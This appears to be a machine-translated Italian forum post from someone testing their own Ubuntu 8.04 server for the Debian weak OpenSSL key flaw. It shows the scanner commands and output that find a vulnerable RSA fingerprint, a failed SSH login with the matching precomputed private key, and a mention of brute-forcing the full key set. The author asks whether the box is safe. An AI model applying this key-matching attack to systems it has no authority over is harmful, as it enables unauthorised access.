DISCLAIMER: la casella vulnerabile su cui ci stiamo sottoponendo appartiene a noi e tutte le azioni sono sotto controllo, quindi non stiamo facendo nulla di illegale qui.
Sto testando una scatola di Ubuntu 8.04, è nota per avere una vulnerabilità delle chiavi OpenSSL deboli . Lo script fornito da Debian ha confermato che il server è vulnerabile:
$ perl dowkd.pl host X.X.X.X
X.X.X.X: weak key (OpenSSH/dsa/1024)
X.X.X.X: weak key (OpenSSH/rsa/2048)
summary: keys found: 2, weak keys: 2
Quindi utilizzo un altro script fornito dal link chiamato debian_ssh_scan_v4.py per trovare l'impronta digitale e la corrispondente chiave pubblica / privata.
$ python debian_ssh_scan_v4.py X.X.X.X
X.X.X.X:22 sshd fingerprint 4795d53ae413531f78f4d45bbd6eb929 VULNERABLE (RSA 2048 bit key, pid 26571)
$ find rsa/2048/4795d53ae413531f78f4d45bbd6eb929*
rsa/2048/4795d53ae413531f78f4d45bbd6eb929-26571
rsa/2048/4795d53ae413531f78f4d45bbd6eb929-26571.pub
La chiave privata (in rsa / 2048 ) viene visualizzata nell'elenco delle possibili chiavi: link
Tuttavia non sono riuscito ad accedere al vuln box usando quella chiave trovata (nota che ubuntu è un utente valido su quella casella):
$ ssh -i rsa/2048/4795d53ae413531f78f4d45bbd6eb929-26571 -o PasswordAuthentication=no [email protected]
Public key 47:95:d5:3a:e4:13:53:1f:78:f4:d4:5b:bd:6e:b9:29 blacklisted (see ssh-vulnkey(1)); continuing anyway
Permission denied (publickey,password).
Ho anche provato a rinforzare tutte le possibili chiavi (che ho estratto dal file compresso) usando lo script WarCat e nessuna chiave è stata in grado di autenticare.
Con tutti questi risultati, posso dire che la scatola è sicura, che ha detto che in realtà non è vulnerabile al debole bug della chiave OpenSSL?